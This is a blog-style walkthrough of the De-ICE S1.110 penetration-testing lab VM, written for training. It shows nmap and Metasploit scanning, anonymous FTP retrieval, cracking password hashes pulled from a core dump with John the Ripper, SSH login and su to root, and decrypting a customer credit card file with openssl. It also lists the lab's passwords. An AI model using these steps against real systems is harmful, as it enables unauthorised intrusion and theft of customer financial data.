De-ICE S1.110 Walkthrough

While digging though an old external drive I found the De-ICE LiveCD’s and walkthrough text files I had put together a few years ago. They are really simple; each one is a link to download the ISO, some non-spoiler information to get started, and spoilers on the off chance that you get stuck on some part of the challenge.

Personally, I learned a lot about post exploitation from some of the challenges in De-ICE. All of the spoilers are in the walkthrough as not to ruin the pen testing fun. Have fun and hopefully these are helpful.

SE-ICE S1.110

Scenario: The scenario for this LiveCD is that a CEO of a small company has tasked you to do more extensive penetration testing of systems within his company. The network administrator has reconfigured systems within his network to meet tougher security requirements and expects you to fail any further penetration attempts. This system is an FTP server used by the network administrator team to create/reload systems on the company intranet. No classified or sensitive information should reside on this server. Through discussion with the administrator, you found out that this server had been used in the past to maintain customer information, but has been sanitized (as opposed to re-built). Prove to the network administrator that proper system configuration is not the only thing critical in securing a server.

Download Link: http://hackingdojo.com/downloads/iso/De-ICE_S1.110.iso

Default IP 192.168.1.110

Flags:
1. create list of open ports
2. create list of users for brute force
3. brute force password for one or more users on an open service
4. Log in using brute force password
5. Perform post exploitation
6. FINAL FLAG: obtain customer credit card information

 

Spoilers and Walkthrough

Change IP – Depending on your configuration you may not need to do this. Log in as root, password is at bottom of page. This assumes that you are using VMWare NAT and XX is the third octet of range you are using.

   ifconfig eth0 192.168.XX.110/24
   route add default gw 192.168.XX.2

Port Scan the System –

   nmap -sV -T4 -O -oX /root/Desktop/deice110 192.168.42.110

Hitting it with a version scan to determine what is running. We are going to output the file as xml and practice using the metasploit database. You can run it all from inside nmap using the db_nmap command and then normal nmap switches but I’m showing you the import function.

   msfconsole
   workspace -a deice
   workspace deice

This creates a database named deice and sets it as the current working

   db_import /root/Desktop/deice110
   hosts

You should see the 110 address. WooHoo!

   services

There should be four ports open. Go check out the website because it has info you need.
adamsa@herot.net
banterb@herot.net
coffeec@herot.net

I love me some FTP, I really love anonymous FTP

   use auxiliary/scanner/ftp/anonymous

Use either use the command line to get access to ftp or filezilla.
I used filezilla and downloaded everything.
The download/etc/shadow seems promising
John can work with the shadow file without unshadowing it.

Running john against it:

   john -rules -wordlist=/usr/share/wordlists/rockyou.txt shadow

john returned a password but it didn’t work.

There is a passwd file in dowload/opt/cygwin/etc but no shadow file so moving along
What is the core file in download/etc?

   file core
   core: ELF 32-bit LSB core file Intel 80386....

Better Google that it is a linux core dump file…go read some on that we’ll wait.

   strings core

The end looks like a dump of a shadow file

   strings core > /root/desktop/deice/coredump

This gives us a working copy on the desktop. I copied out the info and split it at the usernames. If you look at the shadow file from the 100 disk for the normal format; second verse, same as the first.

   john -rules -wordlist=/usr/share/wordlists/rockyou.txt coreshadow

This gives us the following users root, bbanter. SSH to the system and get root.

   ssh to the box as bbanter
   ssh bbanter@192.168.42.110
   su -

From the 100 disk we know that .enc files are encrypted and we are looking for credit card data so why not try to find that again.

   cd /
   find -iname *.enc

That pukes back a lot of things but look at:

   /home/root/.save/customer_account.csv.enc

Jump back to the openssl decrypt if you need help:

   openssl list-cipher-commands
   openssl enc -aes-128-cbc-d -in /home/root/.save/customer_account.csv.enc -out customer_account.csv

WAIT NO JOY!
Lets go look at the /home/root/.save folder

   cd /home/root/.save
   ls

Look at the copy.sh script

   cat copy.sh

This is the script that encrypted the file, the pass is in the “file” section. Lets decrypt it now:

   openssl enc -d -aes-256-cbc -in customer_account.csv.enc -out customer_account.csv -pass file:/etc/ssl/certs/pw
   cat customer_account.csv

BOOM you’re done. Openssl is a pain but now you’re a pro.

Account Information

root:Complexity
bbanter:Zymurgy

Leave a Reply